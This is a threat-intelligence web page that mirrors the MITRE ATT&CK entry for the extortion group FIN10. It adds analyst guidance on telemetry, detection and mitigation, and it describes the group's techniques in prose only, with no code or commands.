Live Active security incident? Get immediate response
MITRE ATT&CK® Group

G0051: FIN10

FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. [1]

EnterpriseG0051GroupObject v1.3 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

FIN10 matters because ATT&CK describes it as a financially motivated group that used stolen, exfiltrated victim data for extortion against North American organizations during the 2013–2016 period. For leaders, the decision value is less about a current campaign claim and more about validating whether the organization can detect and respond to credential abuse, remote access, lateral movement, persistence, and data-theft-driven extortion behaviors.

Executive priority

Treat this as a readiness lens for data extortion risk. Executives should ask whether identity controls, RDP governance, endpoint logging, incident response playbooks, and evidence needed for legal/compliance decisions are strong enough to support rapid containment and fact-finding if stolen-data extortion is alleged. Budget and control priorities should focus on account abuse, remote access paths, Windows execution and persistence mechanisms, and defensible investigation evidence.

Technical view

ATT&CK provides no group-specific detection text and no platforms for FIN10, so SOC validation should be driven by the related behaviors: Empire use; RDP; system/user discovery; scheduled tasks; PowerShell and Windows command shell execution; file deletion; valid and local account abuse; registry run keys/startup folder persistence; lateral tool transfer; and acquisition/use of tools. The strongest defensive validation is whether teams can correlate identity logons, remote desktop activity, process/script execution, persistence changes, file movement, and cleanup activity into a single intrusion timeline.

Likely telemetry

  • Authentication and account-use logs, including local account activity where applicable
  • Remote Desktop Protocol session and logon records on Windows systems
  • PowerShell execution and script logging where enabled
  • Windows command shell process creation and command-line telemetry
  • Scheduled task creation, modification, and execution events

Detection direction

  • Do not rely on a FIN10-specific signature; ATT&CK does not provide detection guidance for this group object.
  • Validate correlation across valid-account logons, RDP sessions, command execution, and persistence changes, since these behaviors can appear administrative in isolation.
  • Tune detections for PowerShell, cmd.exe, scheduled tasks, registry startup changes, and file deletion with attention to administrator false positives.
  • Review whether local accounts and reused administrative credentials are visible in logs; these are common blind spots for Valid Accounts and Local Accounts coverage.
  • Test whether lateral tool transfer between internal systems is observable, not just initial ingress or internet-facing activity.

Mitigation priorities

  • Prioritize governance and monitoring of valid accounts, local accounts, and remote access paths such as RDP.
  • Reduce unnecessary exposure and use of remote desktop and administrative access mechanisms.
  • Harden and monitor Windows persistence locations including scheduled tasks, Run Keys, and Startup Folders.
  • Improve endpoint visibility for PowerShell, Windows command shell, file movement, and file deletion activity.
  • Maintain incident response procedures for data-theft extortion scenarios, including evidence preservation and executive/legal escalation paths.
Analyst notes and limits

The supplied ATT&CK object identifies FIN10 as financially motivated and tied to data extortion, with a cited FireEye report as the primary external reference. The relationship set is useful for defensive planning because it shows the behaviors ATT&CK associates with the group, especially credential abuse, RDP, Windows execution, persistence, lateral movement, and tool use.

ATT&CK provides no official detection text, no group-level platforms or tactics, and the description covers activity since at least 2013 through 2016. This summary does not claim current activity, customer exposure, or guaranteed detection. Local telemetry, architecture, and incident evidence are required to determine actual risk and coverage.

Official MITRE ATT&CK definition

FIN10

FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. [1]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

11 rows
Domain ID Name Relationship / procedure
Enterprise T1070.004 File Deletion Sub-technique

FIN10 has used batch scripts and scheduled tasks to delete critical system files.[1]
Enterprise T1570 Lateral Tool Transfer

FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.[1]
Enterprise T1033 System Owner/User Discovery

FIN10 has used Meterpreter to enumerate users on remote systems.[1]
Enterprise T1059.003 Windows Command Shell Sub-technique

FIN10 has executed malicious .bat files containing PowerShell commands.[1]
Enterprise T1078.003 Local Accounts Sub-technique

FIN10 has moved laterally using the Local Administrator account.[1]
Enterprise T1547.001 Registry Run Keys / Startup Folder Sub-technique

FIN10 has established persistence by using the Registry option in PowerShell Empire to add a Run key.[1]CitationGithub PowerShell Empire
Enterprise T1053.005 Scheduled Task Sub-technique

FIN10 has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.[1]CitationGithub PowerShell Empire
Enterprise T1588.002 Tool Sub-technique

FIN10 has relied on publicly-available software to gain footholds and establish persistence in victim environments.[1]
Enterprise T1021.001 Remote Desktop Protocol Sub-technique

FIN10 has used RDP to move laterally to systems in the victim environment.[1]
Enterprise T1059.001 PowerShell Sub-technique

FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence.[1]CitationGithub PowerShell Empire
Enterprise T1078 Valid Accounts

FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor.[1]
Associated objects

Groups, software, and campaigns

Tool Enterprise

S0363: Empire

Empire is an open-source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]

LinuxmacOSWindows
Relationship explorer

All related ATT&CK context

uses · Technique T1070.004: File Deletion Enterprise uses · Tool S0363: Empire Enterprise uses · Technique T1570: Lateral Tool Transfer Enterprise uses · Technique T1033: System Owner/User Discovery Enterprise uses · Technique T1059.003: Windows Command Shell Enterprise uses · Technique T1078.003: Local Accounts Enterprise uses · Technique T1547.001: Registry Run Keys / Startup Folder Enterprise uses · Technique T1053.005: Scheduled Task Enterprise uses · Technique T1588.002: Tool Enterprise uses · Technique T1021.001: Remote Desktop Protocol Enterprise uses · Technique T1059.001: PowerShell Enterprise uses · Technique T1078: Valid Accounts Enterprise
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.3
Created
Modified
Raw hash
f4f65bf9578ee255...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.3 Current bundle f4f65bf9578e…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    FireEye FIN10 June 2017

    FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved November 17, 2024.

    Open source URL
  2. [2]
    FIN10

    (Citation: FireEye FIN10 June 2017)

  3. [3]
    mitre-attack G0051
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use